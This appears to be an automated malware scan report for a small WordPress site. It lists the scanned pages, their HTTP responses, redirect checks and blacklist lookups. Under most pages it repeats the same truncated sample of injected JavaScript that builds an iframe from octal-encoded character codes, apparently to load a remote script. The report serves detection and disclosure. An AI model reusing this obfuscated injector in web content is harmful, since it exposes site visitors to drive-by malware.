Scanned pages/files
Request | Server response | Status |
http://plmcc.fr/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 01 Sep 2014 11:05:26 GMT Location: http://www.plmcc.fr/ Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=plmcc.fr X-Pingback: http://www.plmcc.fr/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://www.plmcc.fr/ | 200 OK Content-Length: 26608 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
| ||
http://www.plmcc.fr/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://www.plmcc.fr/wp-includes/js/jquery/jquery.js?ver=1.6.1 | 200 OK Content-Length: 91363 Content-Type: application/javascript | clean |
http://www.plmcc.fr/wp-content/plugins/smart-slideshow-widget/js/jquery-ui.min.js?ver=3.2.1 | 200 OK Content-Length: 208692 Content-Type: application/javascript | clean |
http://www.plmcc.fr/wp-content/plugins/smart-slideshow-widget/js/smart-slideshow-widget.js?ver=3.2.1 | 200 OK Content-Length: 4501 Content-Type: application/javascript | clean |
http://plmcc.fr/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 01 Sep 2014 11:05:31 GMT Pragma: no-cache Location: http://www.plmcc.fr/test404page.js Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 01 Sep 2014 11:05:31 GMT Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=plmcc.fr X-Pingback: http://www.plmcc.fr/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://www.plmcc.fr/test404page.js | 404 Not Found Content-Length: 22815 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
| ||
http://www.plmcc.fr/sujet/projects-in-french | 200 OK Content-Length: 25203 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
| ||
http://www.plmcc.fr/sujet/ | 404 Not Found Content-Length: 22815 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
| ||
http://www.plmcc.fr/english-shell-eco-marathon | 200 OK Content-Length: 19050 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
| ||
http://www.plmcc.fr/english-formula-student | 200 OK Content-Length: 19029 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
| ||
http://www.plmcc.fr/actualites | 200 OK Content-Length: 36480 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
| ||
http://www.plmcc.fr/plmcc | 200 OK Content-Length: 18894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
| ||
http://www.plmcc.fr/plmcc-afrique-sud | 200 OK Content-Length: 19017 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
| ||
http://www.plmcc.fr/plmcc-inde-2 | 200 OK Content-Length: 18958 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
| ||
http://www.plmcc.fr/plmcc-bresil | 200 OK Content-Length: 18965 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: plmcc.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 01 Sep 2014 11:05:26 GMT
Location: http://www.plmcc.fr/
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=plmcc.fr
X-Pingback: http://www.plmcc.fr/xmlrpc.php
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: plmcc.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 01 Sep 2014 11:05:26 GMT
Location: http://www.plmcc.fr/
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=plmcc.fr
X-Pingback: http://www.plmcc.fr/xmlrpc.php
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: plmcc.fr
Referer: http://www.google.com/search?q=plmcc.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: plmcc.fr
Referer: http://www.google.com/search?q=plmcc.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=plmcc.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://plmcc.fr/
Result: plmcc.fr is not infected or malware details are not published yet.
Result: plmcc.fr is not infected or malware details are not published yet.